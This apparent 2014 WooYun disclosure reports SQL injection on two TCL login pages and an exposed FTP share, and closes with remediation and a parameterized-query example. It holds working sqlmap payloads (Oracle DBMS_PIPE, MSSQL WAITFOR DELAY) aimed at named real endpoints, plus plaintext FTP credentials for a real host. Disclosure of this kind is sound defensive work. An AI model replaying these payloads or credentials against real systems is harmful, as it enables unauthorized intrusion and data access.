Vulnerability summary
Defect ID: wooyun-2014-048357
Title: TCL multi-subsite vulnerability bundle (SQL injection, information disclosure)
Vendor: TCL official online store
Author: Mr.leo
Submitted: 2014-01-10 18:22
Fixed: 2014-02-24 18:22
Published: 2014-02-24 18:22
Type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-01-10: Details sent to the vendor; awaiting vendor handling
2014-01-10: Vendor confirmed; details visible to the vendor only
2014-01-20: Details disclosed to core white hats and domain experts
2014-01-30: Details disclosed to regular white hats
2014-02-09: Details disclosed to intern white hats
2014-02-24: Details disclosed to the public
Brief description:
TCL multi-subsite vulnerability bundle (SQL injection, information disclosure)
Detailed description:
Site 1:
http://workflow.tclhk.com/workflow/Login.aspx (TCL workflow system)
The UserName parameter of the login form reaches the database without sanitization or parameter binding, giving time-based blind SQL injection against an Oracle backend.
Request captured with Burp:
POST /workflow/Login.aspx HTTP/1.1
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://workflow.tclhk.com/workflow/Login.aspx
Host: workflow.tclhk.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
buCancel=%c8%a1%cf%fb&buLogin=%b5%c7%c8%eb&Passwd=g00dPa%24%24w0rD&UserName=123&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBQKOivWwAQKvruq2CALemv37AgLHye3oAgKQ7PK5BwCUxt0OjVxhYJBbbrGPMTjQNEWr&__VIEWSTATE=/wEPDwUJOTEyMTgyMDM1ZGQNCVe48CQTojD%2bmXal4uBDVhcd7Q%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTEyMTgyMDM1ZGQNCVe48CQTojD+mXal4uBDVhcd7Q==&__EVENTVALIDATION=/wEWBQKOivWwAQKvruq2CALemv37AgLHye3oAgKQ7PK5BwCUxt0OjVxhYJBbbrGPMTjQNEWr&UserName=123' AND 9555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(83)||CHR(83)||CHR(80),5) AND 'UHfe'='UHfe&Passwd=123&buLogin=????
---
[09:33:39] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:33:39] [INFO] fetching current user
[09:33:39] [INFO] resumed: SO
current user: 'SO'
[09:33:39] [INFO] fetching current database
[09:33:39] [INFO] resumed: SO
current schema (equivalent to database on Oracle): 'SO'
[09:33:39] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:33:39] [INFO] fetching database (schema) names
[09:33:39] [INFO] fetching number of databases
[09:33:39] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:33:46] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[09:33:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[09:33:54] [ERROR] unable to retrieve the number of databases
[09:33:54] [INFO] falling back to current database
[09:33:54] [INFO] fetching current database
available databases [1]:
[*] SO
Database: SO
[728 tables]
(Note on the list below: it mixes table names from many unrelated products, e.g. jos_*, wp_*, phpbb_*, nuke_*, webcal_*, in a single Oracle schema behind an ASP.NET workflow application. That pattern is characteristic of sqlmap guessing common table names over the time-based channel rather than reading Oracle's data dictionary, and given the retrieval problems logged above, individual entries should be treated as unverified.)
+-------------------------------------------------+
| ACL_table |
| ADMIN |
| ANSWER_GROUP |
| ANSWER_GROUP_DETAIL |
| Agent |
| Aircraft |
| Apply |
| Association |
| Author |
| BANNERDATA |
| BID |
| BOOK_AUTHORS |
| BOOK_COPIES |
| BUYER |
| CE_table |
| CONTACT |
| COURSE_SECTION |
| CPG_categories |
| CPG_usergroups |
| CPG_users |
| CUST_HIST |
| Campus |
| Channel_Data |
| CheckType |
| ClassificationScheme |
| ClientsTable |
| Component |
| ConsultantsTable |
| CustomerCards |
| DEPENDENT |
| DIM_TYPE |
| DSProp_table |
| DWE_Corr_Sets |
| DWE_Corr_Tokens |
| DWE_Delay_Timers |
| DWE_Predecessors |
| DWE_Roles |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Tasks |
| DWE_WF_Attributes |
| DWE_Workflow_Documents |
| D_Comment |
| D_Unit |
| Defect |
| Departure |
| Descriptions |
| Descriptions_Scripts |
| Descriptions_Variants |
| Desert |
| Domain |
| Dragon_users |
| EMPLOYEE |
| EMPLOYEES |
| ENROLLMENT |
| EmailAddress |
| ExternalLink |
| Factory_Master |
| Factory_Output |
| FindCriteria |
| Flight |
| FoundLists |
| GDirectedRoute |
| Gallery |
| LIBRARY_BRANCH |
| LINEITEM |
| MEMBER |
| MonitorStatus |
| ORDERLINES |
| Orders |
| PERMISSION |
| PN |
| PN_Data |
| POINT_SET |
| POSITION |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_tab_lang |
| PREFIX_timezone |
| PROFILE |
| PUBLISHER |
| PZ |
| Products |
| PropColumnMap |
| Propdesc_table |
| QRTZ_CALENDARS |
| QRTZ_JOB_DETAILS |
| QRTZ_LOCKS |
| QRTZ_TRIGGER_LISTENERS |
| R1Size |
| R1Sum |
| R2IDF |
| R2Weights |
| RegistryPackage |
| River |
| SALES |
| SCALE |
| SCRIPT |
| SIGNON |
| SS_orders |
| SUPPORT_INCIDENTS |
| Sea |
| ServiceBinding |
| Severity |
| Simple_Response |
| Slot |
| SpecialityTable |
| Station_Data |
| Student |
| Students |
| THOT_CATEGORY |
| THOT_DEEP |
| THOT_LANGUAGE |
| THOT_SOURCE |
| THOT_SUB_MENU |
| THOT_YEAR |
| Tasks |
| Thumbnail |
| ThumbnailKeyword |
| UM_PERMISSIONS |
| UM_ROLES |
| UM_ROLE_ATTRIBUTES |
| UM_USERS |
| UM_USER_ATTRIBUTES |
| UM_USER_ROLES |
| UserFields |
| User_ |
| Users |
| Variants |
| Volume |
| ZENTRACK_VARFIELD_IDX |
| access_control |
| account_permissions |
| account_transaction |
| action_attribute |
| action_element |
| actions |
| aggtest |
| applications |
| array_data |
| array_probe |
| artifact |
| artikel |
| ask |
| assignment |
| attrs |
| audio |
| audit |
| audittrail |
| aut |
| autore |
| backend |
| backend_users |
| backenduser |
| backgroundJob_table |
| bbs |
| binaries |
| biosample |
| bkp_Item |
| bkp_ItemReplication |
| bkp_RS_Clusters |
| bkp_ResourceFolder |
| bombing |
| book |
| books |
| bugs |
| cards |
| cart_table |
| categories_posts |
| cc_config |
| cdv_marker |
| cdv_passport_group |
| cdv_passport_set |
| certificates |
| changePrix |
| changeTva |
| channelitems |
| chat_config |
| chat_messages |
| chat_users |
| checksum_results |
| child_configs |
| cities |
| client |
| clients |
| clubconfig |
| cmAvailableServiceBindingSiteNodeTypeDefinition |
| cmContent |
| cmContentVersionDigitalAsset |
| cmDigitalAsset |
| cmLanguage |
| cmRepository |
| cmRepositoryLanguage |
| cmServiceBinding |
| cmServiceDefinition |
| cmSiteNode |
| cmSiteNodeTypeDefinition |
| cmts_track |
| cocktail |
| collection_item_count |
| colour |
| columns_priv |
| combustible |
| command |
| commissionEmployees |
| company |
| computers |
| config_seq |
| configuration |
| connectorassocs |
| content |
| correo |
| coupon |
| courses |
| cpg132_users |
| cpg_config |
| credential |
| cust_order |
| customers_basket |
| customertax |
| customurl |
| cv_crops |
| cv_pests_diseases |
| datasets |
| datasources |
| dbadmins |
| dealer |
| dealers |
| defaults |
| defertest |
| delivery |
| depositor |
| dept_location |
| dept_locations |
| devel_logsql |
| developers |
| diary |
| div_experiment |
| div_obs_unit_sample |
| div_scoring_tech_type |
| div_stock_parent |
| div_synonym |
| domain_info |
| download |
| dtb_baseinfo |
| dtb_bat_order_daily |
| dtb_bat_order_daily_hour |
| dtb_bat_relate_products |
| dtb_kiyaku |
| dtb_mailtemplate |
| dtb_member |
| dtb_order |
| dtb_other_deliv |
| dtb_question_result |
| dtb_review |
| e107_user |
| egresado |
| email |
| emailinfo |
| enrolls |
| evento |
| ew_menu |
| ew_moduli |
| ewst_sessioni |
| exchangerate |
| expression |
| externallinks |
| ez_webstats_conf |
| ezin_articles |
| f_attributedependencies |
| f_sequence |
| f_spatialcontext |
| federationApplicants |
| feedback |
| filearchive |
| files_config |
| film |
| fk_test_has_pk |
| form_data |
| form_definition |
| form_definition_text |
| form_error |
| forum |
| forum_flag |
| forum_user_activity |
| forum_users |
| fragment |
| framework_email |
| friend_statuses |
| func |
| furniture |
| fusion_user_groups |
| fusion_users |
| ganatlebe_ge |
| general_log |
| geo_Estuary |
| geo_Source |
| geo_desert |
| geo_mountain |
| geo_river |
| geo_sea |
| glas |
| globals |
| grandchild_test |
| graphs |
| graphs_items |
| grp |
| guava_role_assignments |
| guava_roles |
| guava_sysmodules |
| guava_views |
| hardware |
| help_keyword |
| help_relation |
| hero |
| hibernate_unique_key |
| history |
| hostbenchmarks |
| hot_prop |
| hourlyEmployees |
| ibf_admin_sessions |
| ibf_conf_settings |
| ibf_members |
| ibf_members_converge |
| ibf_sessions |
| icq |
| image |
| imageCategoryList |
| index |
| individual |
| info |
| interactions |
| inv_lines_seq |
| investigator |
| invoices_seq |
| ipb_sessions |
| iplinks |
| island |
| islandIn |
| items_template |
| jforum_smilies |
| jforum_topics |
| jforum_vote_desc |
| jiveGroupUser |
| jiveOffline |
| jivePrivate |
| jiveRoster |
| jiveSASLAuthorized |
| jiveUser |
| jiveUserProp |
| job_history |
| job_title |
| joomla_users |
| jos_bannerclient |
| jos_blastchatc_users |
| jos_comprofiler_members |
| jos_contact_details |
| jos_content |
| jos_core_log_items |
| jos_core_log_searches |
| jos_groups |
| jos_joomblog_users |
| jos_menu |
| jos_messages_cfg |
| jos_modules |
| jos_moschat_users |
| jos_newsfeeds |
| jos_poll_date |
| jos_sections |
| jos_users |
| jos_vm_auth_group |
| jos_vm_auth_user_group |
| jos_vm_auth_user_vendor |
| jos_vm_cart |
| jos_vm_category |
| jos_vm_category_xref |
| jos_vm_country |
| jos_vm_creditcard |
| jos_vm_currency |
| jos_vm_manufacturer_category |
| jos_vm_order_payment |
| jos_vm_product_attribute |
| jos_vm_product_category_xref |
| jos_vm_product_discount |
| jos_vm_product_votes |
| jos_vm_shipping_label |
| jos_vm_shopper_group |
| jos_vm_state |
| jos_vm_vendor_category |
| jos_vm_waiting_list |
| jos_weblinks |
| knews_lostpass |
| knjiga |
| korisnici |
| kpro_adminlogs |
| kpro_user |
| kultura_ge |
| languages |
| lc_fields |
| librarian |
| licenses |
| loan |
| login_admin |
| login_admins |
| login_user |
| login_users |
| logins |
| logon |
| logs |
| lokal |
| lookup |
| lost_pass |
| lost_passwords |
| lostpass |
| lostpasswords |
| m_admin |
| m_earnings |
| m_with |
| macassocs |
| maclinks |
| macswitches |
| main |
| mambo_session |
| mambo_users |
| manage |
| manager |
| manufacturer |
| marital_status |
| math |
| maxcodevento |
| mb_users |
| meals |
| memberlist |
| metadata |
| minibbtable_users |
| mitglieder |
| mixins |
| mobile_menu_text |
| most_recent_checksum |
| movie |
| movies |
| mtb_pref |
| mtb_zip |
| mucAffiliation |
| mucRoom |
| mucRoomProp |
| mushroom_NBC_class |
| mushroom_test_results |
| mushroom_testset |
| mushroom_trainset |
| my_county |
| my_lake |
| mybb_users |
| mysql |
| name |
| names |
| networks |
| news_lostpass |
| newsletter |
| newsletter_queue |
| nodes |
| nuke_authors |
| nuke_bbconfig |
| nuke_config |
| nuke_gallery_media_types |
| nuke_gallery_pictures |
| nuke_gallery_template_types |
| nuke_popsettings |
| nuke_users |
| numedia |
| obb_profiles |
| object_types |
| objectcache |
| oc |
| odetails |
| operation |
| order |
| organization |
| organization_type_package_map |
| os |
| osc_categories_description |
| osc_manufacturers_info |
| osc_products |
| osc_products_options_values |
| ostypes |
| outdoor_spaces |
| package |
| page_log_exclusion |
| pagelinks |
| pages |
| parent_test |
| parol |
| participate |
| partners |
| partscustomer |
| partsgroup |
| passes |
| passwds |
| password |
| patient |
| payer |
| payment |
| peer_configs |
| perdorues |
| perdoruesit |
| phonelist |
| phones |
| phorum_session |
| phorum_user |
| phorum_users |
| photoo |
| phpads_clients |
| phpads_config |
| phpbb_categories |
| phpbb_forums |
| phpbb_points_config |
| phpbb_posts_text |
| phpbb_themes |
| physician |
| pictures |
| placex |
| pma_bookmark |
| pma_designer_coords |
| pma_relation |
| pma_table_coords |
| pma_tracking |
| po_seq |
| politics |
| poll_user |
| population |
| powers |
| prereq |
| presence |
| pricegroup |
| primarytest |
| primarytest2 |
| problem |
| proc |
| procedure_data_set |
| procs_priv |
| product_font |
| product_font_multi |
| product_related |
| production_multiple |
| profession1 |
| profiling |
| program |
| project_user_xref |
| province |
| punbb_users |
| pwd |
| pwds |
| qrtz_blob_triggers |
| querycachetwo |
| rating_track |
| readers |
| realtable |
| reciprocal_admin |
| reciprocal_config |
| reciprocal_partnersites |
| records |
| ref |
| reg_user |
| reg_users |
| register |
| registered |
| reguser |
| regusers |
| reports |
| reserve |
| resource_types |
| resources |
| result |
| revision |
| roads_endpoints |
| room |
| rooms |
| routerbenchmarks |
| routers |
| rss_categories |
| rss_category |
| rss_item |
| rss_read |
| salariedEmployees |
| sampleData |
| sbreciprocal_cats |
| schedule |
| scripts |
| searchindex |
| sector |
| servers |
| service_request |
| service_request_log |
| services |
| setting |
| settings |
| sf_guard_user_permission |
| shipto |
| site_environment |
| site_login |
| site_logins |
| site_map_ge |
| site_wtype |
| sitelogin |
| sitelogins |
| sites |
| smallnuke_members |
| smf_members |
| soc_da_polit_ge |
| software |
| sporti_ge |
| stars |
| stars_in_movies |
| statistics |
| store |
| subcategory |
| subscriber |
| superuser |
| sys_acl_actions |
| sys_options_cats |
| sysadmin |
| sysadmins |
| sysmaps_links |
| system |
| sysuser |
| sysusers |
| table |
| tables |
| task_param |
| taxonomy |
| tb_admin |
| tb_administrator |
| tb_login |
| tb_member |
| tb_members |
| tb_user |
| tb_username |
| tb_usernames |
| tb_users |
| tbl |
| tbl_client |
| tbl_clients |
| tbl_country |
| tbl_tech |
| tbl_user |
| tbl_users |
| tblblogentriescategories |
| tblblogsearchstats |
| tblblogtrackbacks |
| tblclient |
| tblclients |
| tbluser |
| tf_log |
| tickers |
| time_zone_name |
| time_zone_transition_type |
| track |
| trackbacks |
| transactions |
| transcache |
| translation |
| transport |
| trigger_depends |
| triggers |
| type |
| usebb_members |
| user_admin |
| user_info |
| user_list |
| user_login |
| user_logins |
| user_names |
| user_types |
| usercontrol |
| userinfo |
| userlist |
| userlogins |
| username |
| usernames |
| users_sessions |
| usuario |
| utilise |
| vars |
| vb_user |
| vbulletin_session |
| vbulletin_user |
| vcd_Comments |
| vcd_CoverTypes |
| vcd_CoversAllowedOnMediatypes |
| vcd_Log |
| vcd_MetaData |
| vcd_PropertiesToUser |
| vcd_UserWishList |
| vcd_VcdToPornstars |
| vendortax |
| voodoo_members |
| vote |
| vrls_partners |
| ways |
| webadmin |
| webadmins |
| webcal_asst |
| webcal_entry_ext_user |
| webcal_entry_log |
| webcal_entry_repeats |
| webcal_import_data |
| webcal_nonuser_cals |
| webcal_report |
| webcal_report_template |
| webcal_user |
| webcal_user_layers |
| webmaster |
| webmasters |
| webuser |
| webusers |
| wh_der_children |
| works_on |
| wp_comments |
| wp_options |
| wp_pod_fields |
| wp_pod_types |
| wp_posts |
| wp_term_relationships |
| zips |
| zoph_people |
| zoph_prefs |
| zoph_users |
| zusti_da_sabuneb_ge |
+-------------------------------------------------+
Site 2:
http://www.tcl-elc.com.cn/bc/LogOn.aspx (TCL anti-counterfeiting / anti-diversion barcode management system)
The txtAdmin parameter of the login form is injectable in the same way; sqlmap finds both stacked queries and time-based blind injection against a Microsoft SQL Server backend.
Request captured with Burp:
POST http://www.tcl-elc.com.cn/bc/LogOn.aspx HTTP/1.1
Host: www.tcl-elc.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.tcl-elc.com.cn/bc/LogOn.aspx
Cookie: ASP.NET_SessionId=xlkd403jshtubcirgb0pdanm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io%3D&txtAdmin=123&Button1=&txtPassword=123
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtAdmin
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=1&txtAdmin=1'; WAITFOR DELAY '0:0:5';--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=1&txtAdmin=1' WAITFOR DELAY '0:0:5'--&txtPassword=g00dPa$$w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKQnOBhAo3z5ZgGAoznisYGArWptJELgyXPVQDRbiKtTsMgWqpHNaWL2Io=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDI4NjUyODE5D2QWAgIDD2QWAgIHDw8WAh4EVGV4dGVkZGR2kpKV01OCSEyo1G30qi2qv0lmXw==
---
current user: 'antifake'
current database: 'HuiZhouLegrani'
available databases [1]:
[*] HuiZhouKa
Time-based blind only; not explored further.
Site 3:
vmi.tclking.com
An FTP share is reachable with the credentials below, causing information disclosure.
ftp://vendor:vendorpub@vmi.tclking.com/
Proof of vulnerability:
null
Remediation:
Stop building the login SQL by string concatenation: bind UserName and txtAdmin as query parameters (bind variables) so user input can never change the statement's structure. Input filtering can be added on top but is not a substitute. For site 3, take the FTP share off the internet or restrict it, and change the vendor/vendorpub credentials.
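The remediation above in code, as an added example that is not the vendor's code: the login pattern behind both injection findings in its vulnerable and fixed forms. The real applications are ASP.NET against Oracle and SQL Server; here an in-memory SQLite table, constructed inline, stands in for those backends, and the payloads are exactly the ones sqlmap used against UserName and txtAdmin. SQLite has no WAITFOR or DBMS_PIPE, so where the real backends would sleep five seconds, SQLite rejects the concatenated statement, which still shows that the input was parsed as SQL.

```python
import sqlite3
from typing import Optional, Tuple

# Payloads as sqlmap used them against UserName (Oracle) and txtAdmin (MSSQL).
ORACLE_PAYLOAD = ("123' AND 9555=DBMS_PIPE.RECEIVE_MESSAGE("
                  "CHR(72)||CHR(83)||CHR(83)||CHR(80),5) AND 'UHfe'='UHfe")
MSSQL_PAYLOAD = "1' WAITFOR DELAY '0:0:5'--"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the users table of either login page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def build_login_sql_unsafe(username: str, password: str) -> str:
    """What both sites effectively do: paste the field into the statement.
    A single quote in the input closes the literal and the remainder is
    parsed as SQL, so the sleep in the payload runs inside the login query."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND passwd = '" + password + "'")


def login_unsafe(conn: sqlite3.Connection, username: str,
                 password: str) -> Optional[Tuple[str]]:
    return conn.execute(build_login_sql_unsafe(username, password)).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[Tuple[str]]:
    """Bound parameters: statement text and values travel separately, so
    the input is compared as a plain string and cannot alter the query.
    The ASP.NET equivalent is SqlParameter (@name) / OracleParameter (:name)."""
    sql = "SELECT username FROM users WHERE username = ? AND passwd = ?"
    return conn.execute(sql, (username, password)).fetchone()


def concatenation_breaks_statement(conn: sqlite3.Connection,
                                   username: str) -> bool:
    """True if the concatenated statement no longer parses as the intended
    query, i.e. the user input reached the SQL parser as code."""
    try:
        login_unsafe(conn, username, "x")
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print(build_login_sql_unsafe(MSSQL_PAYLOAD, "x"))
    print("unsafe, payload parsed as SQL:",
          concatenation_breaks_statement(db, MSSQL_PAYLOAD))
    print("safe, payload treated as a username:",
          login_safe(db, MSSQL_PAYLOAD, "x"))
    print("safe, real credentials:", login_safe(db, "alice", "s3cret"))
```

The same bound-parameter shape is what the vendor needs on both pages; a blacklist filter on quotes would not have protected a numeric field or a second-order path and should be treated as defence in depth only.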
Copyright notice: when reposting, credit the source: Mr.leo@WooYun
Vulnerability response
Vendor response:
Severity: High
Rank: 15
Confirmed: 2014-01-10 23:38
Vendor reply:
Thank you for your attention; this has been forwarded to the relevant unit for confirmation and handling.
Latest status:
None yet